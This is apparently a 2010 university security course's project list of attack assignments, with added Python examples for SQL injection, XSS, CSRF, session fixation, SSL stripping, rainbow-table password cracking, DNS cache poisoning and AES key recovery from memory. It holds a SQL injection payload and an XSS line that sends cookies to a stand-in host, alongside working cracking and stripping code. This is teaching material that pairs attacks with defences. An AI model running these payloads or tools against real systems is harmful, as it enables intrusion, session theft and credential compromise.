Computer and Network Security

EECS 588 — Winter 2010


Guidelines

  1. Work with a partner. If you need a partner, try posting to the ctools forum.
  2. Review the list of topics below, and email me your top three choices, along with the name of your partner, by 5pm on Friday, January 15. I'll resolve conflicts and tell you which topic you've been assigned on Monday. Let me know if there are connections to your research area (e.g. machine learning or wireless networking), and I will take these into account when making the assignments.
  3. Write a fresh exploit—don't borrow from pre-packaged attack tools. You may, however, use general purpose tools such as packet sniffers.
  4. You must not test your attack against any real systems except as noted. If you need attack subjects, set up your own dummy systems or use a VM.
  5. If many systems are vulnerable to the attack, construct your demonstration with safety in mind. Design it so that it would be difficult to use against real systems even if it fell into the wrong hands.
  6. Some vulnerabilities have been fixed via software updates. If this is the case, you'll need to demonstrate your attack on an older version.
  7. Many topics include optional bonus challenges. I'll award extra credit proportional to the difficulty of the challenge.
  8. Give a 20 minute presentation in class on the specified date. In it, you should:
    1. Describe how the attack works, how it was discovered, how it was disclosed, and what damage it has caused.
    2. Talk about how you implemented it, including any challenges you faced.
    3. Give a demonstration of your exploit.
    4. Discuss defenses against the attack. If the attack has been fixed, describe how similar problems might be prevented in the future; if it's still a threat, suggest some defenses that might be investigated in new research.

Topics

* Starred topics will be easier if you have some familiarity with assembly language.
† Web security topics (marked with a dagger) will probably be in high demand. If you pick any of these attacks, please also indicate at least two non-web topics that you'd like to do.

1/26/10 | Modern buffer overflow*
Pick a buffer overflow discovered in a major application during the past year and implement your own exploit. Explain how you bypassed modern defenses such as ASLR, DEP, and canaries, if applicable. These articles will help you get started. Bonus challenge: Find and exploit an undocumented buffer overflow in a popular program.

1/28/10 | Return-oriented programming*
Create a dummy program containing a buffer overflow and exploit it using the technique described in this paper. Construct a Turing-complete set of gadgets using the suggested algorithm and demonstrate how this allows you to perform arbitrary computation without injecting any traditional code. Bonus challenge: Apply this to a buffer overflow in a real program.

2/2/10 | Compiler Trojan horse
Modify GCC to implement the self-propagating compiler-resident Trojan horse suggested by Ken Thompson in Reflections on Trusting Trust. Your Trojan should propagate when GCC builds a new copy of itself, and it should inject a demonstration payload when compiling some standard utility program. Bonus challenge: Make a single Trojan that works with two or more compilers, propagating when each builds itself or the other.

2/4/10 | Kernel-level rootkit*
For the operating system of your choice, construct a rootkit (like the one described here) that operates in kernel mode and hides from standard administrative tools; while running, it should not be visible in the file system, process list, or startup files. Bonus challenge: Implement a minimal hypervisor rootkit that loads on the fly and contains a basic payload. You can examine the BluePill source code, but you should reimplement the idea yourself.

2/9/10 | Malicious code in web sites†
Part 1: Build a simple dummy social networking site and use it to demonstrate SQL injection, XSS, and CSRF vulnerabilities. Part 2: Construct an XSS worm to attack your site, like the Samy worm that infected MySpace. Part 3: Implement defenses against each threat. Bonus challenge: Discover an undocumented XSS vulnerability in a popular web site.

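Parts 1 and 3 of this topic in miniature, as an added example that is not from the course page: a toy social-network backend handles the same three requests once vulnerably and once safely. The in-memory SQLite rows, the `alice`/`bob` users, and the `csrf` form field are constructed for the demo.

```python
"""Vulnerable and hardened handlers side by side for SQL injection, XSS and
CSRF (added example, not course code). Demo data is constructed."""
import hmac
import html
import secrets
import sqlite3


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, bio TEXT, secret TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("alice", "likes crypto", "alice-token"),        # constructed rows
        ("bob", "<b>bob</b>", "bob-token"),
    ])
    return db


# --- SQL injection ---------------------------------------------------------
def profile_vulnerable(db, name: str) -> list:
    # User input is spliced into the statement text, so a name of
    #   x' OR '1'='1
    # turns the WHERE clause into a tautology and returns every row.
    return db.execute(f"SELECT name, secret FROM users WHERE name = '{name}'").fetchall()


def profile_safe(db, name: str) -> list:
    # Parameter binding: the value travels separately from the SQL text, so a
    # quote character in `name` can never change the shape of the query.
    return db.execute("SELECT name, secret FROM users WHERE name = ?", (name,)).fetchall()


# --- Cross-site scripting --------------------------------------------------
def render_bio_vulnerable(bio: str) -> str:
    return f"<p class=bio>{bio}</p>"          # any markup in `bio` runs in the viewer's browser


def render_bio_safe(bio: str) -> str:
    # Output encoding for the HTML body context; &, <, >, " and ' become entities.
    return f"<p class=bio>{html.escape(bio, quote=True)}</p>"


# --- Cross-site request forgery -------------------------------------------
def issue_csrf_token(session: dict) -> str:
    # Per-session random secret that the server embeds in its own forms.
    session["csrf"] = secrets.token_urlsafe(32)
    return session["csrf"]


def post_status_vulnerable(session: dict, form: dict) -> bool:
    # Only the ambient cookie authenticates the request, so any page the
    # victim visits can submit this form in their name.
    return session.get("user") is not None


def post_status_safe(session: dict, form: dict) -> bool:
    # A third-party page cannot read the victim's token, so it cannot supply it.
    # Constant-time comparison avoids leaking the token byte by byte.
    token = form.get("csrf", "")
    return session.get("user") is not None and hmac.compare_digest(token, session.get("csrf", ""))


if __name__ == "__main__":
    db = make_db()
    payload = "x' OR '1'='1"
    print("vulnerable:", profile_vulnerable(db, payload))   # every user's secret
    print("safe:      ", profile_safe(db, payload))         # []
    print(render_bio_safe("<script>document.location='//evil.example/'+document.cookie</script>"))
```

The same `' OR '1'='1` payload is what an XSS worm's author would use first to map the database; the parameterised query returns nothing for it, and the escaped bio is what keeps a Samy-style payload from executing in other users' browsers.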
2/11/10 | Abusing cookies†
Part 1: Build a simple dummy web site and use it to demonstrate XSS-based session hijacking and session fixation vulnerabilities. Part 2: Illustrate basic defenses against these attacks. Part 3: Show how history leaking and flash cookies can be used by a site to violate some protections of Chrome's Incognito mode. Bonus challenge: Find a related technique that can compromise the privacy of Tor users running TorButton.

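Session fixation and the fix for it, as an added example (not the course's code) that keeps the whole exchange in one process: HTTP is modelled as dicts, the `alice` credential and the `sid` cookie name are constructed, and `fixation_scenario` plays the attack out against both versions of the server. The cookie flags cover the XSS-hijacking half of Part 2.

```python
"""Session fixation, vulnerable and fixed, in a toy session layer (added
example, not course code). A request carries the cookie the browser sent and
an optional login; the response carries the Set-Cookie header, if any."""
import secrets

USERS = {"alice": "correct horse"}          # constructed demo credential


def cookie_header(sid: str, hardened: bool) -> str:
    # HttpOnly keeps document.cookie (and so an XSS payload) from reading the
    # id; Secure keeps it off plaintext HTTP. Neither stops fixation, which is
    # why the id must also be regenerated when the user logs in.
    flags = "; Path=/; Secure; HttpOnly" if hardened else "; Path=/"
    return f"sid={sid}{flags}"


class Sessions:
    def __init__(self, hardened: bool):
        self.hardened = hardened
        self.store = {}                     # sid -> {"user": name or None}

    def _new(self) -> str:
        sid = secrets.token_urlsafe(32)     # 256 bits from the OS CSPRNG, not guessable
        self.store[sid] = {"user": None}
        return sid

    def handle(self, request: dict) -> dict:
        sid = request.get("cookie_sid")
        set_cookie = None
        if sid is None or (sid not in self.store and self.hardened):
            sid = self._new()
            set_cookie = cookie_header(sid, self.hardened)
        elif sid not in self.store:
            # Vulnerable: adopt whatever id the client presents. An attacker can
            # therefore choose the victim's session id outright.
            self.store[sid] = {"user": None}
        creds = request.get("login")
        if creds and USERS.get(creds[0]) == creds[1]:
            if self.hardened:
                # Fix: a change of privilege gets a fresh id, so an id planted
                # before login (by XSS, a crafted link, a shared terminal) is orphaned.
                del self.store[sid]
                sid = self._new()
                set_cookie = cookie_header(sid, True)
            self.store[sid]["user"] = creds[0]
        return {"sid": sid, "user": self.store[sid]["user"], "set_cookie": set_cookie}


def fixation_scenario(hardened: bool) -> bool:
    """True if the attacker ends up holding the victim's logged-in session."""
    site = Sessions(hardened)
    attacker_sid = site.handle({"cookie_sid": None})["sid"]          # 1. attacker obtains a valid id
    # 2. attacker plants attacker_sid in the victim's browser (the XSS/link step, not modelled)
    site.handle({"cookie_sid": attacker_sid, "login": ("alice", "correct horse")})  # 3. victim logs in
    return site.handle({"cookie_sid": attacker_sid})["user"] == "alice"   # 4. attacker replays the id
```

Against the vulnerable server the attacker's pre-chosen id becomes alice's authenticated session; against the hardened one the login hands alice a new id and the planted one is never recognised again.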
2/16/10 | Fooling web users†
Build a simple mock bank site and demonstrate: (1) an SSL stripping attack, where a man-in-the-middle transparently proxies HTTP requests and rewrites HTTPS links to point to look-alike HTTP links; (2) a clickjacking attack, as described here; (3) picture-in-picture and homograph attacks. Bonus challenge: Enhance your SSL attack to demonstrate the null prefix vulnerability (I'll provide a cert) and to defeat OCSP revocation.

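The pieces of this topic that reduce to code, as an added example and not material from the course page: the rewriting step of an SSL-stripping man-in-the-middle, the HSTS rule that defeats it on a repeat visit, and a mixed-script check that catches the classic Latin/Cyrillic homograph. The host `bank.example`, the headers, and the URLs are constructed.

```python
"""SSL-strip rewriting, the HSTS defence, and a homograph check (added
example, not course code). Hosts, headers and URLs are constructed."""
import re
import unicodedata
from urllib.parse import urlsplit


class SslStripper:
    """Downgrades what the victim sees and remembers which hosts to speak TLS to upstream."""

    def __init__(self):
        self.downgraded_hosts = set()

    def rewrite_body(self, html_text: str) -> str:
        for url in re.findall(r"https://[^\s\"'<>]+", html_text, flags=re.IGNORECASE):
            self.downgraded_hosts.add(urlsplit(url).hostname)
        return re.sub(r"https://", "http://", html_text, flags=re.IGNORECASE)

    def rewrite_headers(self, headers: dict) -> dict:
        out = dict(headers)
        loc = out.get("Location", "")
        if loc.lower().startswith("https://"):            # a redirect to HTTPS is downgraded too
            self.downgraded_hosts.add(urlsplit(loc).hostname)
            out["Location"] = "http://" + loc[len("https://"):]
        if "Set-Cookie" in out:                           # a Secure cookie would never return over our plaintext leg
            out["Set-Cookie"] = re.sub(r";\s*Secure", "", out["Set-Cookie"], flags=re.IGNORECASE)
        out.pop("Strict-Transport-Security", None)       # harmless to strip; the browser ignores it over HTTP anyway
        return out

    def upstream_scheme(self, host: str) -> str:
        # The victim talks HTTP to us; we talk HTTPS to every host we downgraded.
        return "https" if host in self.downgraded_hosts else "http"


class Browser:
    """Only the HSTS rule, which is what makes stripping fail on a second visit."""

    def __init__(self):
        self.hsts_hosts = set()

    def note_response(self, url: str, headers: dict) -> None:
        # Honoured only when received over a genuine TLS connection, so the
        # man-in-the-middle cannot inject or forge it on the plaintext leg.
        if url.startswith("https://") and "Strict-Transport-Security" in headers:
            self.hsts_hosts.add(urlsplit(url).hostname)

    def effective_url(self, url: str) -> str:
        parts = urlsplit(url)
        if parts.scheme == "http" and parts.hostname in self.hsts_hosts:
            return "https://" + url[len("http://"):]   # upgraded before any packet leaves the browser
        return url


def script_of(ch: str) -> str:
    return unicodedata.name(ch, "UNKNOWN").split(" ")[0]    # 'LATIN', 'CYRILLIC', 'GREEK', ...


def mixed_script_host(host: str) -> bool:
    """Flag a hostname whose letters come from more than one script, e.g. Latin
    'paypal' with a Cyrillic 'а' (U+0430) swapped in. Not a full IDN policy,
    but it is the check that catches the textbook homograph."""
    scripts = {script_of(c) for c in host if c.isalpha()}
    return len(scripts) > 1
```

Stripping works only on the first visit: once the browser has seen `Strict-Transport-Security` over a real TLS connection, `effective_url` upgrades the rewritten `http://` link before the proxy ever sees it, which is the defence the clickjacking and picture-in-picture halves of the topic do not have.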
2/18/10 | Browser DNS rebinding†
Use Flash or Java to implement a DNS rebinding attack that subverts the browser's same origin policy. Show how this technique can be used to attack hosts behind a firewall.

2/23/10 | Password cracking with rainbow tables
Implement a fast password cracker based on the Rainbow Table data structure (more details here). Compute a table containing SHA-1 hashes for as many passwords as you can (assuming a length of 8 characters or fewer). Adapt the wordlist and letter frequency approaches used by programs like John the Ripper. In class, demonstrate that you can quickly recover passwords from hashes provided by other students. Explain the time-memory trade-offs you faced and how you chose the parameters for your implementation.

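A complete, if tiny, rainbow table over SHA-1, as an added example that is not course code. The lowercase alphabet, the fixed length of 3, and the values of `CHAIN_LEN` and the chain count are chosen so it builds in well under a second; a table for the assignment's 8-character space runs the same algorithm with a reduction function that maps into the variable-length space and far more chains.

```python
"""Toy rainbow table over SHA-1 password hashes (added example, not course
code). The keyspace is deliberately tiny; the algorithm is the real one."""
import hashlib
import string

ALPHABET = string.ascii_lowercase
PASSWORD_LEN = 3
KEYSPACE = len(ALPHABET) ** PASSWORD_LEN      # 17,576 candidate passwords
CHAIN_LEN = 50                                # hashes covered per stored chain


def sha1(password: str) -> bytes:
    return hashlib.sha1(password.encode()).digest()


def index_to_password(n: int) -> str:
    """Bijection from [0, KEYSPACE) onto the password space."""
    out = []
    for _ in range(PASSWORD_LEN):
        n, r = divmod(n, len(ALPHABET))
        out.append(ALPHABET[r])
    return "".join(out)


def reduction(digest: bytes, column: int) -> str:
    """R_column: digest -> password. Folding the column index in is what makes
    this a rainbow table rather than a Hellman table: two chains that collide
    in different columns do not merge, so far less storage is wasted."""
    return index_to_password((int.from_bytes(digest[:8], "big") + column) % KEYSPACE)


def build_table(num_chains: int) -> dict:
    """Return {end_point: start_point}. Each chain covers CHAIN_LEN hashes but
    only its two ends are stored: that is the memory side of the trade-off."""
    table = {}
    for i in range(num_chains):
        start = pw = index_to_password(i)
        for column in range(CHAIN_LEN):
            pw = reduction(sha1(pw), column)
        table.setdefault(pw, start)           # on a merged end point keep the first chain
    return table


def crack(table: dict, target: bytes):
    """Recover the password behind `target`, or None.

    For each column c (last to first) assume the target sits in column c,
    regenerate the rest of the chain to its end point and look that up. A hit
    is only a candidate: the chain is replayed from its start so that a false
    alarm (another chain sharing the end point) is rejected. Lookup cost is
    about CHAIN_LEN^2 / 2 reductions: the time side of the trade-off."""
    for c in range(CHAIN_LEN - 1, -1, -1):
        pw = reduction(target, c)
        for column in range(c + 1, CHAIN_LEN):
            pw = reduction(sha1(pw), column)
        start = table.get(pw)
        if start is None:
            continue
        pw = start
        for column in range(CHAIN_LEN):
            if sha1(pw) == target:
                return pw
            pw = reduction(sha1(pw), column)
    return None


def coverage(table: dict, samples: int = 200) -> float:
    """Fraction of the last `samples` passwords (none of them chain starts) the
    table recovers; shows what more chains or longer chains buy."""
    hits = sum(crack(table, sha1(index_to_password(i))) is not None
               for i in range(KEYSPACE - samples, KEYSPACE))
    return hits / samples


if __name__ == "__main__":
    table = build_table(2000)
    print(f"{len(table)} chains stored for a keyspace of {KEYSPACE}")
    print("qqq ->", crack(table, sha1("qqq")))
    print(f"coverage of sampled keyspace: {coverage(table):.0%}")
```

The parameters to explain in the presentation are exactly the ones above: the table holds `num_chains` pairs and can cover at most `num_chains * CHAIN_LEN` hashes, while each lookup costs on the order of `CHAIN_LEN^2 / 2` hash-and-reduce steps, so doubling chain length halves memory for the same coverage and quadruples lookup time.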
2/25/10 | CAPTCHA cracking
Start with a simple CAPTCHA (like one of these) and create a program that reliably defeats it. Extend your work to break at least two of these CAPTCHAs: AOL Mail, Sirius Radio, and eBay. You might adapt some of the techniques used by this work or this work. Bonus challenge: For major extra points, break reCAPTCHA or the Google CAPTCHA with at least 1% success.

3/9/10 | DNS cache poisoning
Demonstrate Dan Kaminsky's fast DNS poisoning attack (another description), where the attacker brute forces responses to insert a false IP address into a DNS cache. Implement the countermeasure described in this paper.

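An in-process model of the race Kaminsky's attack wins, as an added example that is not course code. No packets are sent: a toy recursive resolver and a toy attacker exchange Python objects, so only the arithmetic of the race is modelled, not the wire format. The countermeasure the course's linked paper describes is not visible on this page; the model uses source-port randomisation because its effect on the guessing space is easy to measure. `example.com`, the attacker address, and the RNG seed are constructed.

```python
"""Kaminsky-style cache poisoning and source-port randomisation, simulated
in one process (added example, not course code)."""
import random
from dataclasses import dataclass, field

TXID_BITS = 16        # all the entropy in a 2008-era response-matching check
PORT_BITS = 16        # what randomising the query source port adds (a little less in practice)


@dataclass
class Response:
    qname: str
    txid: int
    dst_port: int
    glue: str         # authority/additional data: who serves example.com


@dataclass
class Resolver:
    randomize_ports: bool
    rng: random.Random
    cache: dict = field(default_factory=dict)
    pending: dict = field(default_factory=dict)      # qname -> (txid, source port)

    def send_query(self, qname: str) -> None:
        txid = self.rng.getrandbits(TXID_BITS)
        port = self.rng.getrandbits(PORT_BITS) if self.randomize_ports else 53
        self.pending[qname] = (txid, port)

    def receive(self, resp: Response) -> bool:
        """Accept the first reply whose (name, txid, port) match an open query and
        cache its in-bailiwick glue. That last step is what Kaminsky exploited:
        a reply about a throwaway name can replace the NS data for the whole zone."""
        if self.pending.get(resp.qname) != (resp.txid, resp.dst_port):
            return False
        del self.pending[resp.qname]
        self.cache["example.com NS"] = resp.glue
        return True


def kaminsky_attack(resolver: Resolver, forged_per_query: int, max_queries: int,
                    rng: random.Random):
    """Number of races needed to poison the cache, or None if max_queries run out.

    Each race the attacker makes the resolver look up a fresh random name (so
    there is no cached answer and no TTL to wait out), then floods guesses
    before the genuine answer arrives. Losing costs nothing: pick another name."""
    for n in range(1, max_queries + 1):
        qname = f"{rng.getrandbits(32):08x}.example.com"
        resolver.send_query(qname)                           # triggered via an <img> tag, a mail, etc.
        for _ in range(forged_per_query):
            port = rng.getrandbits(PORT_BITS) if resolver.randomize_ports else 53
            forged = Response(qname, rng.getrandbits(TXID_BITS), port,
                              glue="ns.example.com A 203.0.113.66 (attacker)")
            if resolver.receive(forged):
                return n
        resolver.pending.pop(qname, None)                    # the genuine reply wins this race
    return None


def expected_races(forged_per_query: int, randomize_ports: bool) -> float:
    """Mean races to a win if each forged reply is a distinct guess."""
    bits = TXID_BITS + (PORT_BITS if randomize_ports else 0)
    return 2 ** bits / forged_per_query


if __name__ == "__main__":
    rng = random.Random(2010)
    weak = Resolver(randomize_ports=False, rng=rng)
    print("txid only: poisoned after", kaminsky_attack(weak, 500, 5000, rng), "races")
    strong = Resolver(randomize_ports=True, rng=rng)
    print("with port randomisation:", kaminsky_attack(strong, 500, 200, rng))
    print(f"expected races: {expected_races(500, False):.0f} vs {expected_races(500, True):.0f}")
```

With 16 bits to guess and 500 forgeries per race the attacker needs about 130 races, a few seconds of traffic; with the port randomised the same budget needs millions, which is why the 2008 patches added port entropy rather than trying to stop the repeated queries.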
3/11/10 | Multiuser keystroke eavesdropping
This paper describes how an attacker with an account on a multiuser Linux system can exploit side channels to recover keystroke timing from other users. Develop a program to extract timings for login and show that it can be used to speed up password guessing. Bonus challenge: Extract timings for vim and implement a Hidden Markov Model to reconstruct English text.

3/16/10 | Rogue wireless access point*
Modify an open-source wireless access point to conduct a man-in-the-middle attack against users who connect through it. Whenever a binary is downloaded via HTTP, modify it on the fly to insert a Trojan horse. I will provide a Linksys WRT54G router. Bonus challenge: Support HTTPS, exploiting the null prefix vulnerability (I'll provide a cert) and defeating OCSP revocation.

3/18/10 | Smartphone spyware
Develop a demonstration spyware program for Android or jailbroken iPhones. Your program should illustrate the dangers of surreptitious data theft, recording, photographing, and location tracking. Think like an attacker: How would you convince users to install the software? How would you conceal it? How would you exfiltrate collected data? Make your demo as realistic as possible. Bonus challenge: Exploit a known iPhone bug to install your spyware without jailbreaking.

3/23/10 | Traffic de-anonymization
Set up a simple anonymizer service that lets users establish an SSH tunnel to a server running an HTTP proxy. An attacker on the network near a web server could modify all outgoing packets to insert a covert watermark by altering their sizes or timing. An accomplice monitoring SSH packets arriving at the client could detect the watermark to tell that the user is visiting that site. Demonstrate such an attack. Bonus challenge: Make your attack work against Tor.

3/30/10 | Cold-boot attack
Targeting a popular disk encryption product, create an automated tool to implement the attacks described here. Your tool should recover memory contents after a cold reboot, locate the encryption keys, and provide access to the disk contents. You may use existing memory imaging tools as part of your implementation. Bonus challenge: Target BitLocker.

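The "locate the encryption keys" step for AES-128, as an added example that is not course code: a 16-byte window of the image is a key candidate if the 160 bytes after it match the round keys AES derives from it, within a bit-error budget, which is how the published cold-boot key finder copes with DRAM decay (the page does not spell that technique out; the attribution is ours). The S-box and key expansion follow FIPS-197; the memory image, offset, and decay pattern are constructed.

```python
"""Finding an AES-128 key in a decayed memory image by key-schedule search
(added example, not course code). FIPS-197 arithmetic, constructed image."""
import random


def _build_sbox() -> list:
    """Rijndael S-box from the GF(2^8) inverse and affine map, to avoid a 256-entry table."""
    sbox = [0] * 256
    p = q = 1
    while True:
        p = (p ^ (p << 1) ^ (0x1B if p & 0x80 else 0)) & 0xFF      # p *= 3
        q ^= q << 1; q &= 0xFF                                   # q /= 3, keeping p*q == 1
        q ^= q << 2; q &= 0xFF
        q ^= q << 4; q &= 0xFF
        if q & 0x80:
            q ^= 0x09
        rot = lambda x, s: ((x << s) | (x >> (8 - s))) & 0xFF
        sbox[p] = (q ^ rot(q, 1) ^ rot(q, 2) ^ rot(q, 3) ^ rot(q, 4) ^ 0x63) & 0xFF
        if p == 1:
            break
    sbox[0] = 0x63                                                # 0 has no inverse
    return sbox


SBOX = _build_sbox()


def expand_key(key: bytes) -> bytes:
    """FIPS-197 key expansion for AES-128: 16-byte key -> 176-byte schedule."""
    words = [list(key[i:i + 4]) for i in range(0, 16, 4)]
    rcon = 0x01
    for i in range(4, 44):
        t = list(words[i - 1])
        if i % 4 == 0:
            t = [SBOX[b] for b in t[1:] + t[:1]]        # RotWord then SubWord
            t[0] ^= rcon
            rcon = (rcon << 1) ^ (0x11B if rcon & 0x80 else 0)
        words.append([a ^ b for a, b in zip(words[i - 4], t)])
    return bytes(sum(words, []))


def bit_errors(a: bytes, b: bytes) -> int:
    return sum(bin(x ^ y).count("1") for x, y in zip(a, b))


def find_aes128_keys(image: bytes, max_bit_errors: int = 8) -> list:
    """Every (offset, key) whose following 160 bytes match the schedule the
    candidate key generates, within max_bit_errors flipped bits. The tolerance
    is what makes this work on a decayed image; errors in the 16 key bytes
    themselves are not corrected here, only tolerated in the round keys."""
    hits = []
    for off in range(len(image) - 176 + 1):
        key = image[off:off + 16]
        if bit_errors(expand_key(key)[16:], image[off + 16:off + 176]) <= max_bit_errors:
            hits.append((off, key))
    return hits


def make_decayed_image(key: bytes, offset: int, flips: int, seed: int = 1) -> bytes:
    """Constructed 2 KiB of random 'memory' with one schedule planted at `offset`,
    then `flips` distinct bits of the planted round keys flipped to mimic decay."""
    rng = random.Random(seed)
    image = bytearray(rng.getrandbits(8) for _ in range(2048))
    image[offset:offset + 176] = expand_key(key)
    for pos in rng.sample(range(offset + 16, offset + 176), flips):
        image[pos] ^= 1 << rng.randrange(8)
    return bytes(image)


if __name__ == "__main__":
    key = bytes.fromhex("2b7e151628aed2a6abf7158809cf4f3c")    # FIPS-197 Appendix A.1 key
    image = make_decayed_image(key, offset=700, flips=5)
    for off, k in find_aes128_keys(image):
        print(f"key at offset {off}: {k.hex()}")
```

The same scan is what a full tool would run over a dump taken by the memory-imaging tools the assignment allows; an exact-match search fails as soon as a single bit has decayed, which is why the budget matters.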
4/1/10 | Firmware-resident malware*
Reproduce the results from this paper to show that malicious firmware can be loaded onto the Apple Aluminum Keyboard. Make a simple payload that records the first few characters typed after power on (likely the login password) and replays them when a secret key combination is pressed. I'll provide a keyboard. You may need a Mac for this project. Bonus challenge: Implement a full keylogger, using the keyboard's flash memory for nonvolatile storage.